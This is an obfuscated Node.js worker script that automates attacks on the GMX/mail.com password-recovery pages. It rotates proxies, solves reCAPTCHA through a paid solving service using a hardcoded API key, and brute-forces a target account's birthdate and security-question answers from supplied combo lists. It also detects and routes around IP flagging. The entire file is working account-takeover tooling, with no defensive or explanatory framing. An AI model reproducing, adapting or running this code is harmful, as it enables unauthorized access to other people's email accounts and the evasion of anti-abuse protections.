const _0x50dc72 = _0x46ab;
(function (_0x572186, _0x293ef3) {
    const _0x2bff86 = _0x46ab,
        _0x686b3c = _0x572186();
    while (!![]) {
        try {
            const _0x19e066 =
                (-parseInt(_0x2bff86(0x1bc)) / 0x1) * (-parseInt(_0x2bff86(0x1a7)) / 0x2) +
                -parseInt(_0x2bff86(0x1c1)) / 0x3 +
                (-parseInt(_0x2bff86(0x1af)) / 0x4) * (-parseInt(_0x2bff86(0x18a)) / 0x5) +
                -parseInt(_0x2bff86(0x1a5)) / 0x6 +
                (-parseInt(_0x2bff86(0x19b)) / 0x7) * (-parseInt(_0x2bff86(0x1a2)) / 0x8) +
                (parseInt(_0x2bff86(0x1aa)) / 0x9) * (-parseInt(_0x2bff86(0x170)) / 0xa) +
                (-parseInt(_0x2bff86(0x1b5)) / 0xb) * (-parseInt(_0x2bff86(0x195)) / 0xc);
            if (_0x19e066 === _0x293ef3) break;
            else _0x686b3c["push"](_0x686b3c["shift"]());
        } catch (_0x1ef807) {
            _0x686b3c["push"](_0x686b3c["shift"]());
        }
    }
})(_0x3e5b, 0x4e637);
const mailSiteKey = _0x50dc72(0x1ad),
    twoCaptchaKey = "0b51a952763694c341a7f13d5c6334db",
    fs = require("fs"),
    chalk = require(_0x50dc72(0x1c2)),
    tough = require(_0x50dc72(0x1b1)),
    Cookie = tough[_0x50dc72(0x19d)],
    request = require(_0x50dc72(0x1ca)),
    cheerio = require(_0x50dc72(0x1c5)),
    Captcha = require(_0x50dc72(0x1c6)),
    email = process[_0x50dc72(0x17c)][0x2],
    dateOfBirth = process[_0x50dc72(0x17c)][0x3];
let [month, day, year] = dateOfBirth[_0x50dc72(0x1b6)]("/")[_0x50dc72(0x1b9)]((_0x112a09) => parseInt(_0x112a09));
const threadNum = parseInt(process[_0x50dc72(0x17c)][0x4]),
    mode = parseInt(process[_0x50dc72(0x17c)][0x5]),
    siteDomain = email["split"]("@")[0x1]["includes"](_0x50dc72(0x18d)) ? _0x50dc72(0x1a0) : "mail",
    [host, port, user, pass] = fs[_0x50dc72(0x1b3)](_0x50dc72(0x181), _0x50dc72(0x1c8))[_0x50dc72(0x1b6)](":");
function _0x3e5b() {
    const _0x26d03b = [
        "http://",
        "POST",
        "time",
        "yellow",
        "158700MDznbM",
        "request",
        "searchParams",
        "gmx.",
        "combo",
        ".0-securityAnswerForm-continueButton&srttkn=",
        "get",
        "href",
        "exit",
        ".com",
        "request_work",
        "1682808xDMVNN",
        "wicket/page?1&amp;srttkn=",
        "Solver",
        "legend:contains(\x22Via\x20security\x20question\x22)",
        "end",
        "text",
        "63896VkmZwa",
        "Marking\x20as\x20invalid\x20here",
        "Cookie",
        "timeEnd",
        "action",
        "gmx",
        "\x20ready\x20to\x20bruteforce.",
        "8SJoGAa",
        "HTTP",
        "start",
        "3549732UjXaJp",
        "GET",
        "4076hNrQUj",
        "send",
        "Solve\x20Captcha",
        "9fmcUSE",
        "wicket/page?2&amp;srttkn=",
        "startsWith",
        "6Lcl2goTAAAAAHM0bTyHtHt_oo-JeTIqcdPiWAZb",
        "white",
        "80RcZDmC",
        "each",
        "tough-cookie",
        "attr",
        "readFileSync",
        "Security\x20questions\x20not\x20enabled\x20on\x20the\x20account,\x20exiting...",
        "77KkNeBB",
        "split",
        "includes",
        "[+]",
        "map",
        "getFullYear",
        "ajax-location",
        "127qLgTqU",
        "fieldset.content-form\x20p\x20span",
        ".com/passwordrecovery/wicket/page?3-",
        "srttkn",
        "stack",
        "1077504UCPnvv",
        "chalk",
        "Trying:\x20",
        "XMLHttpRequest",
        "cheerio",
        "2captcha",
        "find",
        "utf8",
        "https://password.",
        "request-promise",
        "padStart",
        ".com/passwordrecovery/wicket/",
        "substring",
        "match",
        "Thread:\x20",
        "6125230eZDklI",
        "error",
        "body",
        "Get\x20to\x20Security\x20Question\x20Page",
        "uri",
        "data",
        "form[method=\x22post\x22]",
        "./page?2",
        "length",
        "jar",
        ".0-birthDateForm-continueButton&srttkn=",
        "toString",
        "argv",
        "load",
        "headers",
        "red",
        "application/x-www-form-urlencoded;\x20charset=UTF-8",
        "./combos/proxy.txt",
        "toLowerCase",
        "log",
        "Flagged,\x20restarting\x20with\x20new\x20IP...",
        "IP\x20flagged\x20on\x20birthday,\x20restarting...",
    ];
    _0x3e5b = function () {
        return _0x26d03b;
    };
    return _0x3e5b();
}
function _0x46ab(_0x462aeb, _0x1c58ba) {
    const _0x3e5bf9 = _0x3e5b();
    return (
        (_0x46ab = function (_0x46ab26, _0x207681) {
            _0x46ab26 = _0x46ab26 - 0x16d;
            let _0x58e5b3 = _0x3e5bf9[_0x46ab26];
            return _0x58e5b3;
        }),
        _0x46ab(_0x462aeb, _0x1c58ba)
    );
}
let currentCombo;
const mainLogic = async () => {
    const _0x1bea31 = _0x50dc72;
    try {
        const _0x5d4bf6 = new Captcha[_0x1bea31(0x197)](twoCaptchaKey),
            _0x5e7835 = request[_0x1bea31(0x179)]();
        let _0x18834a = 0x0,
            _0x4a52cc = await request({
                uri: "https://password." + siteDomain + _0x1bea31(0x193),
                resolveWithFullResponse: !![],
                followRedirect: (_0xf4c469) => ++_0x18834a <= 0x2,
                jar: _0x5e7835,
                simple: ![],
                proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
            });
        const _0x522f45 = new URL(_0x4a52cc[_0x1bea31(0x18b)][_0x1bea31(0x174)][_0x1bea31(0x191)]),
            _0x41b8a2 = _0x522f45[_0x1bea31(0x18c)][_0x1bea31(0x190)](_0x1bea31(0x1bf));
        let _0x4fd2cb = cheerio[_0x1bea31(0x17d)](_0x4a52cc[_0x1bea31(0x172)]),
            _0x242102 = _0x4fd2cb(_0x1bea31(0x176))[_0x1bea31(0x1b2)]("action")[_0x1bea31(0x16d)](0x2);
        console["time"](_0x1bea31(0x1a9));
        const _0x56f233 = await _0x5d4bf6["recaptcha"](
            mailSiteKey,
            _0x1bea31(0x1c9) + siteDomain + ".com/passwordrecovery/wicket/page?1&srttkn=" + _0x41b8a2,
            { proxy: user + ":" + pass + "@" + host + ":" + port, proxytype: _0x1bea31(0x1a3) }
        );
        console[_0x1bea31(0x19e)](_0x1bea31(0x1a9));
        const _0x32cf37 = _0x56f233[_0x1bea31(0x175)];
        console[_0x1bea31(0x188)](_0x1bea31(0x173)),
            (_0x18834a = 0x0),
            (_0x4a52cc = await request({
                uri: _0x1bea31(0x1c9) + siteDomain + _0x1bea31(0x1cc) + _0x242102,
                method: "POST",
                resolveWithFullResponse: !![],
                followRedirect: (_0x553c1f) => ++_0x18834a <= 0x2,
                jar: _0x5e7835,
                simple: ![],
                proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                form: {
                    srttkn: _0x41b8a2,
                    "accountIdentContainer:accountIdentInput": email,
                    "g-recaptcha-response": _0x32cf37,
                    continueButton: 0x1,
                },
                headers: {
                    "Wicket-Ajax": !![],
                    "Wicket-Ajax-Baseurl": _0x1bea31(0x196) + _0x41b8a2,
                    "X-Requested-With": _0x1bea31(0x1c4),
                    "Content-Type": "application/x-www-form-urlencoded;\x20charset=UTF-8",
                },
            }));
        (!_0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)] ||
            !_0x4a52cc[_0x1bea31(0x17e)]["ajax-location"][_0x1bea31(0x1ac)](_0x1bea31(0x177))) &&
            (console[_0x1bea31(0x183)](_0x1bea31(0x19c)),
            console["log"](_0x242102),
            process[_0x1bea31(0x1a8)]({ invalidEmail: !![] }),
            process[_0x1bea31(0x192)](0x1));
        (_0x4a52cc = await request({
            uri:
                _0x1bea31(0x1c9) +
                siteDomain +
                _0x1bea31(0x1cc) +
                _0x4a52cc["headers"]["ajax-location"][_0x1bea31(0x16d)](0x2),
            method: _0x1bea31(0x1a6),
            resolveWithFullResponse: !![],
            jar: _0x5e7835,
            simple: ![],
            proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
        })),
            (_0x4fd2cb = cheerio[_0x1bea31(0x17d)](_0x4a52cc["body"]));
        let _0x5a574d;
        _0x4fd2cb("form")[_0x1bea31(0x1b0)](function (_0x44e8de, _0x35b24a) {
            const _0x1cc099 = _0x1bea31;
            _0x4fd2cb(this)[_0x1cc099(0x1c7)](_0x1cc099(0x198))[_0x1cc099(0x178)] > 0x0 &&
                (_0x5a574d = _0x4fd2cb(this)[_0x1cc099(0x1b2)](_0x1cc099(0x19f)));
        });
        !_0x5a574d &&
            (console[_0x1bea31(0x183)](
                chalk[_0x1bea31(0x17f)]("[+]") + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x1b4))
            ),
            process[_0x1bea31(0x1a8)]({ end: !![] }),
            process["exit"](0x1));
        (_0x4a52cc = await request({
            uri: _0x1bea31(0x1c9) + siteDomain + ".com/passwordrecovery/wicket/" + _0x5a574d[_0x1bea31(0x16d)](0x2),
            method: _0x1bea31(0x187),
            resolveWithFullResponse: !![],
            jar: _0x5e7835,
            simple: ![],
            proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
            form: { srttkn: _0x41b8a2, recoveryContinueButton: 0x1 },
            headers: {
                "Wicket-Ajax": !![],
                "Wicket-Ajax-Baseurl": _0x1bea31(0x1ab) + _0x41b8a2,
                "X-Requested-With": _0x1bea31(0x1c4),
                "Content-Type": "application/x-www-form-urlencoded;\x20charset=UTF-8",
            },
        })),
            (_0x4a52cc = await request({
                uri:
                    _0x1bea31(0x1c9) +
                    siteDomain +
                    _0x1bea31(0x1cc) +
                    _0x4a52cc["headers"][_0x1bea31(0x1bb)][_0x1bea31(0x16d)](0x2),
                method: _0x1bea31(0x1a6),
                resolveWithFullResponse: !![],
                jar: _0x5e7835,
                simple: ![],
                proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
            })),
            (_0x4fd2cb = cheerio["load"](_0x4a52cc[_0x1bea31(0x172)])),
            (_0x242102 = _0x4fd2cb(_0x1bea31(0x176))[_0x1bea31(0x1b2)]("action")[_0x1bea31(0x16d)](0x2));
        if (mode == 0x2)
            (_0x4a52cc = await request({
                uri: _0x1bea31(0x1c9) + siteDomain + _0x1bea31(0x1cc) + _0x242102,
                method: "POST",
                resolveWithFullResponse: !![],
                jar: _0x5e7835,
                simple: ![],
                proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                form: {
                    srttkn: _0x41b8a2,
                    "birthDateContainer:birthDateInput:day": day[_0x1bea31(0x17b)]()[_0x1bea31(0x1cb)](0x2, "0"),
                    "birthDateContainer:birthDateInput:month": month[_0x1bea31(0x17b)](),
                    "birthDateContainer:birthDateInput:year": (new Date()[_0x1bea31(0x1ba)]() - year)[
                        _0x1bea31(0x17b)
                    ](),
                    continueButton: 0x1,
                },
                headers: {
                    "Wicket-Ajax": !![],
                    "Wicket-Ajax-Baseurl": _0x1bea31(0x1ab) + _0x41b8a2,
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": _0x1bea31(0x180),
                },
            })),
                _0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)] &&
                    _0x4a52cc["headers"][_0x1bea31(0x1bb)][_0x1bea31(0x1b7)]("error") &&
                    (console["log"](
                        chalk[_0x1bea31(0x17f)](_0x1bea31(0x1b8)) + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x185))
                    ),
                    process[_0x1bea31(0x192)](0x0));
        else {
            let _0x3b6eb7 = 0x0;
            while (!![]) {
                if (!currentCombo) {
                    process[_0x1bea31(0x1a8)](_0x1bea31(0x194)),
                        await new Promise((_0x371a21) => setTimeout(_0x371a21, 0x32));
                    continue;
                }
                const _0x1207c1 = currentCombo;
                console[_0x1bea31(0x183)](
                    chalk["yellow"](_0x1bea31(0x1b8)) + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x1c3) + _0x1207c1)
                );
                let [_0x426db5, _0x3e32ba, _0x50a73b] = currentCombo[_0x1bea31(0x1b6)]("/")[_0x1bea31(0x1b9)](
                    (_0x5bd95f) => parseInt(_0x5bd95f)
                );
                _0x4a52cc = await request({
                    uri:
                        "https://password." +
                        siteDomain +
                        _0x1bea31(0x1be) +
                        ++_0x3b6eb7 +
                        _0x1bea31(0x17a) +
                        _0x41b8a2,
                    method: _0x1bea31(0x187),
                    resolveWithFullResponse: !![],
                    jar: _0x5e7835,
                    simple: ![],
                    proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                    form: {
                        srttkn: _0x41b8a2,
                        "birthDateContainer:birthDateInput:day": _0x3e32ba[_0x1bea31(0x17b)]()["padStart"](0x2, "0"),
                        "birthDateContainer:birthDateInput:month": _0x426db5[_0x1bea31(0x17b)](),
                        "birthDateContainer:birthDateInput:year": (new Date()[_0x1bea31(0x1ba)]() - _0x50a73b)[
                            "toString"
                        ](),
                        continueButton: 0x1,
                    },
                    headers: {
                        "Wicket-Ajax": !![],
                        "Wicket-Ajax-Baseurl": _0x1bea31(0x1ab) + _0x41b8a2,
                        "X-Requested-With": _0x1bea31(0x1c4),
                        "Content-Type": _0x1bea31(0x180),
                    },
                });
                const _0x398e2d = _0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)];
                !_0x398e2d &&
                    (console[_0x1bea31(0x183)](_0x4a52cc[_0x1bea31(0x172)]),
                    console["log"](_0x4a52cc[_0x1bea31(0x17e)]),
                    console[_0x1bea31(0x183)](
                        chalk[_0x1bea31(0x17f)]("[+]") + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x184))
                    ),
                    process["send"]({ failed: !![], combo: currentCombo }),
                    process[_0x1bea31(0x192)](0x0));
                const _0x57e164 = _0x398e2d["match"](/page\?(\d+)&srttkn=.+/);
                (!_0x57e164 || (_0x57e164[0x1] != 0x3 && _0x57e164[0x1] != 0x4)) &&
                    (console["log"](
                        chalk[_0x1bea31(0x17f)]("[+]") +
                            "\x20" +
                            chalk[_0x1bea31(0x1ae)]("Flagged,\x20restarting\x20with\x20new\x20IP...")
                    ),
                    process["send"]({ failed: !![], combo: currentCombo }),
                    process["exit"](0x0)),
                    _0x57e164[0x1] == 0x4 && (process["send"]({ answer: _0x1207c1 }), process[_0x1bea31(0x192)](0x0)),
                    process[_0x1bea31(0x1a8)]({ dontMarkInvalid: !![], email: email }),
                    (currentCombo = null),
                    (_0x4a52cc = await request({
                        uri:
                            _0x1bea31(0x1c9) +
                            siteDomain +
                            _0x1bea31(0x1cc) +
                            _0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)][_0x1bea31(0x16d)](0x2),
                        method: _0x1bea31(0x1a6),
                        resolveWithFullResponse: !![],
                        jar: _0x5e7835,
                        simple: ![],
                        proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                    }));
            }
        }
        (_0x4a52cc = await request({
            uri:
                _0x1bea31(0x1c9) +
                siteDomain +
                _0x1bea31(0x1cc) +
                _0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)][_0x1bea31(0x16d)](0x2),
            method: _0x1bea31(0x1a6),
            resolveWithFullResponse: !![],
            jar: _0x5e7835,
            simple: ![],
            proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
        })),
            (_0x4fd2cb = cheerio[_0x1bea31(0x17d)](_0x4a52cc["body"])),
            (_0x242102 = _0x4fd2cb(_0x1bea31(0x176))[_0x1bea31(0x1b2)](_0x1bea31(0x19f)));
        !_0x242102 &&
            (console[_0x1bea31(0x183)](
                chalk[_0x1bea31(0x17f)](_0x1bea31(0x1b8)) +
                    "\x20" +
                    chalk[_0x1bea31(0x1ae)]("IP\x20flagged\x20on\x20birthday,\x20restarting...")
            ),
            process[_0x1bea31(0x192)](0x0));
        _0x242102 = _0x242102["substring"](0x2);
        const _0x1662a9 = _0x4fd2cb(_0x1bea31(0x1bd))[_0x1bea31(0x19a)]();
        console[_0x1bea31(0x183)](
            chalk[_0x1bea31(0x189)]("[+]") +
                "\x20" +
                chalk[_0x1bea31(0x1ae)](_0x1bea31(0x16f) + (threadNum + 0x1) + _0x1bea31(0x1a1))
        ),
            process[_0x1bea31(0x1a8)]({ comboType: _0x1662a9[_0x1bea31(0x182)]() });
        let _0x5736b6 = 0x0;
        while (!![]) {
            if (!currentCombo) {
                process["send"](_0x1bea31(0x194)), await new Promise((_0x3d9f12) => setTimeout(_0x3d9f12, 0x32));
                continue;
            }
            const _0x36038d = currentCombo;
            console[_0x1bea31(0x183)](
                chalk[_0x1bea31(0x189)]("[+]") + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x1c3) + _0x36038d)
            );
            const _0x306a90 =
                _0x1bea31(0x1c9) +
                siteDomain +
                ".com/passwordrecovery/wicket/page?4-" +
                ++_0x5736b6 +
                _0x1bea31(0x18f) +
                _0x41b8a2;
            _0x4a52cc = await request({
                uri: _0x306a90,
                method: "POST",
                resolveWithFullResponse: !![],
                jar: _0x5e7835,
                simple: ![],
                proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                form: {
                    srttkn: _0x41b8a2,
                    "securityAnswerContainer:securityAnswerInput": _0x36038d,
                    continueButton: 0x1,
                },
                headers: {
                    "Wicket-Ajax": !![],
                    "Wicket-Ajax-Baseurl": "wicket/page?2&amp;srttkn=" + _0x41b8a2,
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": _0x1bea31(0x180),
                },
            });
            const _0x5aee7a = _0x4a52cc[_0x1bea31(0x17e)]["ajax-location"],
                _0x3a0b19 = _0x5aee7a[_0x1bea31(0x16e)](/page\?(\d+)&srttkn=.+/);
            (!_0x3a0b19 || (_0x3a0b19[0x1] != 0x4 && _0x3a0b19[0x1] != 0x5)) &&
                (console[_0x1bea31(0x183)](
                    chalk[_0x1bea31(0x17f)](_0x1bea31(0x1b8)) + "\x20" + chalk[_0x1bea31(0x1ae)](_0x1bea31(0x184))
                ),
                process[_0x1bea31(0x1a8)]({ failed: !![], combo: currentCombo }),
                process[_0x1bea31(0x192)](0x0)),
                _0x3a0b19[0x1] == 0x5 &&
                    (process[_0x1bea31(0x1a8)]({ answer: _0x36038d }), process[_0x1bea31(0x192)](0x0)),
                process[_0x1bea31(0x1a8)]({ dontMarkInvalid: !![], email: email }),
                (currentCombo = null),
                (_0x4a52cc = await request({
                    uri:
                        _0x1bea31(0x1c9) +
                        siteDomain +
                        _0x1bea31(0x1cc) +
                        _0x4a52cc[_0x1bea31(0x17e)][_0x1bea31(0x1bb)][_0x1bea31(0x16d)](0x2),
                    method: "GET",
                    resolveWithFullResponse: !![],
                    jar: _0x5e7835,
                    simple: ![],
                    proxy: _0x1bea31(0x186) + user + ":" + pass + "@" + host + ":" + port,
                }));
        }
    } catch (_0xd047e1) {
        console[_0x1bea31(0x171)](_0xd047e1[_0x1bea31(0x1c0)]),
            process[_0x1bea31(0x1a8)]({ failed: !![], combo: currentCombo }),
            process[_0x1bea31(0x192)](0x0);
    }
};
process["on"]("message", (_0x1bad28) => {
    const _0x5c76c4 = _0x50dc72;
    if (_0x1bad28[_0x5c76c4(0x1a4)]) mainLogic();
    else {
        if (_0x1bad28[_0x5c76c4(0x199)]) process[_0x5c76c4(0x192)](0x0);
        else _0x1bad28[_0x5c76c4(0x18e)] && (currentCombo = _0x1bad28[_0x5c76c4(0x18e)]);
    }
});
